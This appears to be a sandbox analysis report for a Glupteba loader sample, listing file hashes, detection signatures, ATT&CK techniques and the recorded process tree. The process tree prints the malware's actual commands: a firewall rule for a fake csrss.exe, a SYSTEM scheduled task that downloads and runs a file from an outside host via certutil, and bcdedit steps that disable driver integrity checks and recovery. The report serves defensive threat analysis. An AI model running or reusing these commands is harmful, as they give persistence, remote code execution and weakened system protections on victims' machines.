glupteba | b25b92d25b55c23f75775f1f50e83d5efc2881e8bdb02c0d2a3c3b4b21ccb9eb

Analysis

max time kernel
22s
max time network
169s
platform
windows7_x64
resource
win7-20231215-en
resource tags

arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
submitted
06/01/2024, 10:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

45cf09e26acea6e9d65bfef33939f4cc.exe
Size

4.4MB
MD5

45cf09e26acea6e9d65bfef33939f4cc
SHA1

0f8fde24d0f0cabbcfcd97eb1b7ae84f4cbd4331
SHA256

b25b92d25b55c23f75775f1f50e83d5efc2881e8bdb02c0d2a3c3b4b21ccb9eb
SHA512

8913e691f5e6f449cad2d0836635b148b0fc98411218b7f2f4920b40cb8ad9ae8b385a88806a045aaeca477076180ab3087519e0d1ab4345bac82a9739a9af35
SSDEEP

98304:YoIRGeaWtfnBWWGqJlOOpLFWikkLMXwxFr8oiWtWKo4pX0x:mvnhGqJlOOjWRkLMAxFDF9

Score

10^/10

glupteba metasploit backdoor dropper evasion loader trojan

Malware Config

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba payload 9 IoCs

resource	yara_rule
behavioral1/memory/2812-2-0x0000000000400000-0x0000000003097000-memory.dmp	family_glupteba
behavioral1/memory/2812-3-0x0000000004D30000-0x0000000005656000-memory.dmp	family_glupteba
behavioral1/memory/2812-4-0x0000000000400000-0x0000000003097000-memory.dmp	family_glupteba
behavioral1/memory/3040-12-0x0000000004CB0000-0x00000000055D6000-memory.dmp	family_glupteba
behavioral1/memory/3040-13-0x0000000000400000-0x0000000003097000-memory.dmp	family_glupteba
behavioral1/memory/3040-16-0x0000000000400000-0x0000000003097000-memory.dmp	family_glupteba
behavioral1/memory/3040-23-0x0000000000400000-0x0000000003097000-memory.dmp	family_glupteba
behavioral1/memory/3040-33-0x0000000000400000-0x0000000003097000-memory.dmp	family_glupteba
behavioral1/memory/296-36-0x0000000000400000-0x0000000003097000-memory.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit

Modifies boot configuration data using bcdedit 14 IoCs

pid	Process
2004	bcdedit.exe
1104	bcdedit.exe
1588	bcdedit.exe
548	bcdedit.exe
1876	bcdedit.exe
2624	bcdedit.exe
2728	bcdedit.exe
1980	bcdedit.exe
2968	bcdedit.exe
1600	bcdedit.exe
2832	bcdedit.exe
2444	bcdedit.exe
1432	bcdedit.exe
1812	bcdedit.exe

Modifies Windows Firewall 1 TTPs 1 IoCs

evasion

Windows Service

T1543.003

pid	Process
2216	netsh.exe

Possible attempt to disable PatchGuard 2 TTPs
Rootkits can use kernel patching to embed themselves in an operating system.
evasion

Impair Defenses
T1562

Command and Scripting Interpreter
T1059

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
2288	schtasks.exe
1892	schtasks.exe

GoLang User-Agent 3 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	36	Go-http-client/1.1
HTTP User-Agent header	42	Go-http-client/1.1
HTTP User-Agent header	35	Go-http-client/1.1

C:\Users\Admin\AppData\Local\Temp\45cf09e26acea6e9d65bfef33939f4cc.exe
"C:\Users\Admin\AppData\Local\Temp\45cf09e26acea6e9d65bfef33939f4cc.exe"
1⤵
PID:2812
- C:\Users\Admin\AppData\Local\Temp\45cf09e26acea6e9d65bfef33939f4cc.exe
  "C:\Users\Admin\AppData\Local\Temp\45cf09e26acea6e9d65bfef33939f4cc.exe"
  2⤵
  PID:3040
- - C:\Windows\system32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
    3⤵
    PID:1084
  - - C:\Windows\system32\netsh.exe
      netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      PID:2216
- - C:\Windows\rss\csrss.exe
    C:\Windows\rss\csrss.exe ""
    3⤵
    PID:296
  - - C:\Windows\system32\schtasks.exe
      schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://spolaect.info/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
      4⤵
      Creates scheduled task(s)
      PID:2288
  - - C:\Windows\system32\schtasks.exe
      schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
      4⤵
      Creates scheduled task(s)
      PID:1892
  - - C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
      "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
      4⤵
      PID:892
    - - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:2004
    - - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:1104
    - - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:1588
    - - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:548
    - - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:1876
    - - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:2624
    - - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -timeout 0
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:2728
    - - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:1980
    - - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:2968
    - - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:1600
    - - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:2832
    - - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:2444
    - - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:1432
  - - C:\Windows\system32\bcdedit.exe
      C:\Windows\Sysnative\bcdedit.exe /v
      4⤵
      Modifies boot configuration data using bcdedit
      PID:1812
  - - C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
      C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
      4⤵
      PID:660
  - - C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
      C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
      4⤵
      PID:2636

C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240106102330.log C:\Windows\Logs\CBS\CbsPersist_20240106102330.cab
1⤵
PID:2596

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Scheduled Task/Job

T1053

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Impair Defenses

T1562

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error

Filesize
194KB

MD5
a0bb8d322247f2ec8bb47928abf72908

SHA1
177ed1c30e6f3248453e7238d0d411e524771d92

SHA256
ee6e35f08dc77971b0f1deb587fa6f1898bca323a805838be5c4a56305bd1287

SHA512
66912c176723386c5850ee4eeea71bf7fd0476cd8ae279f585105a9a99b88e1f852b82d83cce19bd225173768d587043ba289e4d595e00b69e6711bf4008c91f

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

Filesize
38KB

MD5
922187c1062bd7e4022c27db19bcbf52

SHA1
63f8cc0adb3cdd09b28cd06f19d3a65a39616191

SHA256
a9e58c63307943ff9343d66f3767e3ac984c49674fe07ba5c22f1375c2c34f37

SHA512
f18351d2d454b5ee14e06542fb3a6d54c546e05a357c01db0b1a9031236f6812ebabb188816f17c00371f493e6eab9b26340ff04ec85fdb1918030bc81ac482f

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

Filesize
38KB

MD5
7c873272ea7e426adf736cfbc325ae6c

SHA1
dfc06689909d269151bda2045072c411f274a04d

SHA256
8f1f32411b241e89f812c2a24c259063ba6c24f8b2bfeedf3dc9930992a8700a

SHA512
3f47e1e0d38894a90e0f049d74c87b2b825b4b46079cbdd3b50831be9485fee503a894d24b644f72b636cec9d59dd3bd60f1cf11055fce9e928e04f48978153b

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

Filesize
195KB

MD5
b7a1d580e71f23ae3eb11d536834b53f

SHA1
8323d838a8b2f45f5c674138b9a170245c9a7294

SHA256
55dca40665924e123a9b40e9debe006fddc0ae4551a17dd92af8a4988fb18212

SHA512
69768fe9a1db6363582d30f26b8c4f6c9ff70de11d64e88327f9867270108b98e0747f13ca6b941826b61ece5b0a5768e307cc24a714486169f088411b4be993

Download Submit
C:\Users\Admin\AppData\Local\Temp\osloader.exe

Filesize
77KB

MD5
00024824034885f227d2ec333058c0b1

SHA1
6e6f515ae7ff86373bf50ef0a78f74aaf8583bb5

SHA256
b89d59344575bca8542c29a3bbb7dd2e231351f382671ce05766e14c65479d13

SHA512
13d02487e3102296b7164c1aa888c884f1e28dd261972e534dd304b2c37c54fe2f7dca672c6fc4d6b95f76d1673cf670e48b0f714d88e800c1235d041981c716

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A

Filesize
893B

MD5
d4ae187b4574036c2d76b6df8a8c1a30

SHA1
b06f409fa14bab33cbaf4a37811b8740b624d9e5

SHA256
a2ce3a0fa7d2a833d1801e01ec48e35b70d84f3467cc9f8fab370386e13879c7

SHA512
1f44a360e8bb8ada22bc5bfe001f1babb4e72005a46bc2a94c33c4bd149ff256cce6f35d65ca4f7fc2a5b9e15494155449830d2809c8cf218d0b9196ec646b0c

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

Filesize
1KB

MD5
a266bb7dcc38a562631361bbf61dd11b

SHA1
3b1efd3a66ea28b16697394703a72ca340a05bd5

SHA256
df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

SHA512
0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
a7fcbf86289ba0658a2565b851122ac2

SHA1
7990ff6cd108e096e1da3dbf8709e327eeeed73e

SHA256
bb7971f2a83985f6e0c26a09b81c2227b59e7142e7e9f4a8c21f491029724ddb

SHA512
ca0075f12c16b8f490cf9314f902bca7f1c53d1e6f24666489012d949eff0b252d3cd29fff5d0270dbc09fca69f2ef68da045f872726b6bac2d56a8b431bfd26

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
a19c8918962ac0cffeb6388d423703cd

SHA1
a48776a6eff31cc707b99ef4388fc79a23d098c6

SHA256
64af8e420d79653d999d6a2ad1b195b6b70a90bc49a97f8fe1c81b862614f526

SHA512
bd843bc7b550d45cd2c429987c490d0a1d4849f01fbabfc87fb1644418a2f6f679efde17b628a35e3d319908095c689ddb2ae6f70b61439c6e0159f306954f19

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
250b09acb07271ad6e743b0fcc0683ce

SHA1
25d84bf974e84e0d9eba9be530e2fe49fecff96e

SHA256
6be2079b82faf2db0ac2b405f5b0d9e5383832992718b586fa1704ae65282ffa

SHA512
a4ce448c0d1851490105a8fbfdce9ca412b336400a5ba4b1e2e6971a4c8278f0f85bded3aded299e7375cd3b4fdaec1595087ce8246b57d55b57c90f93e2cf22

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
7e052a0c5d2563248193ac0e3e5f15ba

SHA1
612b68c0b4e709ad44feea42b55abd2b65f8b8e6

SHA256
226b6284d63b407d18000d246efabf57e94c640122eba0f33362a7345b7bf9ea

SHA512
0ef531a20d779503fd1a1ddaadb93d59b724ee4b2ffbf7c26a769c395ff9b173032d85bad344b47cfd5f966a9b0b4d4c720d6d06d4adbee9a00a0718e7382972

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
bf2340d7dfe1a91a02841139f3808c9a

SHA1
ce3d607885d7f66cf1aeb3813c766d9af3db80e1

SHA256
677a51656ff4109d9d916d0846b0e4c3021ce3803c9f69a37f0e1e5c194ff7b3

SHA512
82ce6eecf256bc0da4f3f0c822735ad3dcc86d4e6c872e8b215c67ec0bd8470b6e12e407addcb4659959e8ea2215243ab94751d8df7ae682090f92352397cdc6

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

Filesize
242B

MD5
bb782631803d53824f3bb341bbe112e0

SHA1
19c64b89e3ddeaf2f5afec8cfd9062fed303760b

SHA256
48c6bdeed0f43d3aedd38e2c98a1fd12e5550b0cb1a5c3f79e3fed916972a744

SHA512
697d4aad1856c89fe7ea3e4c5732ed420bbddf4b90a393693d365da03a58b9cc5a93947656c08f23738538ff3a594237403bbc76be184523f6c2db3177f88d94

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

Filesize
242B

MD5
e394328dd3d51ed28d72039922c90be1

SHA1
0642ad9054677eb272a2a28b49d0dba042890f1a

SHA256
c273bf6d2b970196971ae849f86814d0a806c7a61213d1053df88c7c93eed52a

SHA512
b487318c8c0100d99b623f5625407039a33f61cbd4f875b414e4e179962440ef06b8e7a9a46096f788f45821a234efe24837336028ca09da9fbe286f36d1c48c

Download Submit
C:\Windows\rss\csrss.exe

Filesize
397KB

MD5
ca651512ceae17e341e347ca5083bbc3

SHA1
00f8c001d4fcf12a9fbe73b3aa1bf9f71d619f36

SHA256
4c68566925fc523b1f850b54f561fd4f99eb6f074aa225713de3f0b893916d86

SHA512
ffda69899bf7efd70ca216409d9684039101d6895c44f2bd49d351f3f51c71fa563ff54d2cfd34914cfc8d22212259aac3255926ab86e0624c7967b043ca1d7b

Download Submit
C:\Windows\rss\csrss.exe

Filesize
375KB

MD5
f395e47588513f7319280517eece7839

SHA1
975b0f1a5e0277b473cf60b40a28d0d6c2f120b4

SHA256
af50c8f7d24228ff4404971e2270589210773f0b11d641d6da947d6cebbbc487

SHA512
2488067b5bf31aafbc3d54fe6ed387d95a99ee6891aadf11a878a5d0416e4752dc258e53ec443f4477498b70a3450c35618a6a5c3797eed05b5a2b070b74b13f

Download Submit
C:\Windows\rss\csrss.exe

Filesize
83KB

MD5
75585c241908522d593db13d50255d46

SHA1
3497895c1cd99b359a069538bbb7c68faa4a2eec

SHA256
edde7641e25000eaabf348d4e38cbc4175c38f8cac1d75964be71dcc2bf4d0cc

SHA512
8d6fdd0162e08ab8673e7a6ac6d497e83c435b70b91a66e3f21f9c44a327502d87211830a3b6a5386706fb2a3afeb004513ebcc886a78b94165fcf1bd865df2c

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

Filesize
44KB

MD5
65e3435572fc6e3cdd8ebbe155331a0a

SHA1
9360b5bda3a8dd1b44c0fc8388edd0c563cb7b6c

SHA256
487995a6551ab6bad38cddd34af0e4a2c5e7f3bd846e8595c498fb063aca735f

SHA512
e1480e2d3b16f1d6dc084576d57158b547893bc0434d8cdbea835f2c3dd52373a5f5911a9ee67f451f8f8affecb89f12b716e83014fb24ddc7bc5f78404c42a6

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

Filesize
29KB

MD5
78cc604069d90a810db27ef6216107b2

SHA1
df67810bb9e577bfc71e2ecfebd22e453cc5f6e5

SHA256
25a0eb45a3bcb85c41a7c1337b03834b3ab559d550a87da63f9a1cc244866c1c

SHA512
b0eac14f7999f082e1e53c776f5602d6743b2da53469647dc01588559dde6ff8b620cbb29beed4cb2d60f548c7d7d8be1d9d33c182a2d889a7b49c5f2c8ed09a

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\patch.exe

Filesize
402KB

MD5
3f4abfaca0cecd5f6e3e0dca48fbfe78

SHA1
7d75aa2cf4a9b4c2d133fa47d675465d672ca079

SHA256
7ef0fc75695908b1ae9095286df1750be7ad3498b3af8de9bc126ec6117db8c7

SHA512
3eeb13ad37d2e23771f242ba77f5adf1a741302438e5d88ec67c1d1b1dea0dfb7b614db2fe10d5ee6307270a8155ec843f7f5d25f1abf866fd839c159cd6ff57

Download Submit
\Users\Admin\AppData\Local\Temp\dbghelp.dll

Filesize
87KB

MD5
0669a5401b644179917d5c4cb0e79ce4

SHA1
a40a564c8662d1e316c2093c647a7ae146503426

SHA256
d2fe8e8fcf430c1da098a45d2c3331dd945f08b44d6404cb37dec1f6508a4a36

SHA512
1c083e3f24a49fc75e5019c682d403ab12c57c1644e84a92d36babca04f50e964a93474c7ad698bec392f0a40b4657505803d2c85f3f83728bd20fdfac289484

Download Submit
\Users\Admin\AppData\Local\Temp\osloader.exe

Filesize
85KB

MD5
0ad3b09460539b537c247f6195cd7923

SHA1
cd12603ecdde6c2cb2ce1e11055438034f26ab10

SHA256
86f8dc78ce5669e7861bd6f194c87dc51344892447a661eadf7651e8a51deb4c

SHA512
0db9eb5f1ed85cab156578a0ecbab61d4abacc0534c1443b120fd78d874998176be12b2194f211b4ecac112b2ca224e1c29f903a26c73487492de4023f02ee9e

Download Submit
\Users\Admin\AppData\Local\Temp\osloader.exe

Filesize
112KB

MD5
1d10ff8ddc5501d7e6c8959dbc37a234

SHA1
f399ae3abbb19c1f5b2a5c208af3e4d1374ab4fb

SHA256
bd0b7fb4cdbc9487baab9f3da0aeb5fc16ffa1e4101f1ce74eada90e1490a8f8

SHA512
af5aecc5ff283556197978707fa9d6ef38cc3be0248d2ec5ffa61324101c1680720ee6fc31a32ace831e7b3de23f53bb0af022b55c65a6b4067db5d711d933a2

Download Submit
\Users\Admin\AppData\Local\Temp\osloader.exe

Filesize
92KB

MD5
cb1953770bee2d96c80e6772bb97bdc8

SHA1
c2900285667f5ed3c5bbcd46374bc3ec28f9a967

SHA256
1614ed9d87c6f4e7d9ce506706ff7ccef25a76c59b2e70d94d6a0967b293f040

SHA512
26ae97e7b16442982f8d08f0fb7dcd52393b568d57348e22ca2bdf3c2be0cdd6942a3dee1196210ecdd2a87284474c4b4a31f9fe0624a6c3e08e6970b32f02c4

Download Submit
\Users\Admin\AppData\Local\Temp\symsrv.dll

Filesize
92KB

MD5
0eb38b3c6218c2234bda0d1ca99af85e

SHA1
2692bccbef8f962129c59494bb3388993275288c

SHA256
c4a0c65813229fbad222a7529cd2491556b1174293da1bea550613554a783fa7

SHA512
a293505f013b2546736327f35b047fad806b7edc171e0d6770b1439546c38dc4ac9f0b70eefb24eed6778e7aaee452c324f724165e4721f3f08b4abfc206c5ee

Download Submit
\Windows\rss\csrss.exe

Filesize
505KB

MD5
d5774dca08805ebcdf2f87ead4a6d6cd

SHA1
d547af5861e55b8d6fb34d0a1bcacff63d5f4218

SHA256
ac02de4b9ae109bd8e75612d366c2f990ea0a66670fe1752ec17ae5780fd90d4

SHA512
44599a5ac29d4d353760d373904c7b35139b55d8ad1e1436cf4f346f68da3942442a1ba1e880954c117b4ed4d61041d05b78ab77260dcc3421831a651a1a7cf7

Download Submit
\Windows\rss\csrss.exe

Filesize
295KB

MD5
2393da403e3a91780c9f315f3c329a04

SHA1
fd89876a3e447641d1b2ca0fa41da96b5e953757

SHA256
c691fc56d9fb1222cf73dd4c7e8b1143a7ebb60efaf9a807d80cc5d2402b9622

SHA512
a0cda0a6dd5fa22a2ad4fe3ff2b9aa464eeb48d65dca2cbc2f2e7d8b30394f9c993d08ffb66537031ca14628c5b301c36c081e4323acb255142a319db2a3e5af

Download Submit
memory/296-384-0x0000000000400000-0x0000000003097000-memory.dmp

Filesize
44.6MB

Download
memory/296-447-0x0000000000400000-0x0000000003097000-memory.dmp

Filesize
44.6MB

Download
memory/296-70-0x0000000004A10000-0x0000000004E4C000-memory.dmp

Filesize
4.2MB

Download
memory/296-110-0x0000000000400000-0x0000000003097000-memory.dmp

Filesize
44.6MB

Download
memory/296-111-0x0000000000400000-0x0000000003097000-memory.dmp

Filesize
44.6MB

Download
memory/296-36-0x0000000000400000-0x0000000003097000-memory.dmp

Filesize
44.6MB

Download
memory/296-34-0x0000000004A10000-0x0000000004E4C000-memory.dmp

Filesize
4.2MB

Download
memory/296-363-0x0000000000400000-0x0000000003097000-memory.dmp

Filesize
44.6MB

Download
memory/296-32-0x0000000004A10000-0x0000000004E4C000-memory.dmp

Filesize
4.2MB

Download
memory/296-37-0x0000000000400000-0x0000000003097000-memory.dmp

Filesize
44.6MB

Download
memory/296-446-0x0000000000400000-0x0000000003097000-memory.dmp

Filesize
44.6MB

Download
memory/296-445-0x0000000000400000-0x0000000003097000-memory.dmp

Filesize
44.6MB

Download
memory/296-415-0x0000000000400000-0x0000000003097000-memory.dmp

Filesize
44.6MB

Download
memory/892-43-0x0000000140000000-0x00000001405E8000-memory.dmp

Filesize
5.9MB

Download
memory/892-57-0x0000000140000000-0x00000001405E8000-memory.dmp

Filesize
5.9MB

Download
memory/2812-4-0x0000000000400000-0x0000000003097000-memory.dmp

Filesize
44.6MB

Download
memory/2812-1-0x00000000048F0000-0x0000000004D2C000-memory.dmp

Filesize
4.2MB

Download
memory/2812-0-0x00000000048F0000-0x0000000004D2C000-memory.dmp

Filesize
4.2MB

Download
memory/2812-6-0x00000000048F0000-0x0000000004D2C000-memory.dmp

Filesize
4.2MB

Download
memory/2812-2-0x0000000000400000-0x0000000003097000-memory.dmp

Filesize
44.6MB

Download
memory/2812-3-0x0000000004D30000-0x0000000005656000-memory.dmp

Filesize
9.1MB

Download
memory/3040-5-0x0000000004870000-0x0000000004CAC000-memory.dmp

Filesize
4.2MB

Download
memory/3040-16-0x0000000000400000-0x0000000003097000-memory.dmp

Filesize
44.6MB

Download
memory/3040-18-0x0000000004870000-0x0000000004CAC000-memory.dmp

Filesize
4.2MB

Download
memory/3040-13-0x0000000000400000-0x0000000003097000-memory.dmp

Filesize
44.6MB

Download
memory/3040-12-0x0000000004CB0000-0x00000000055D6000-memory.dmp

Filesize
9.1MB

Download
memory/3040-23-0x0000000000400000-0x0000000003097000-memory.dmp

Filesize
44.6MB

Download
memory/3040-11-0x0000000004870000-0x0000000004CAC000-memory.dmp

Filesize
4.2MB

Download
memory/3040-33-0x0000000000400000-0x0000000003097000-memory.dmp

Filesize
44.6MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads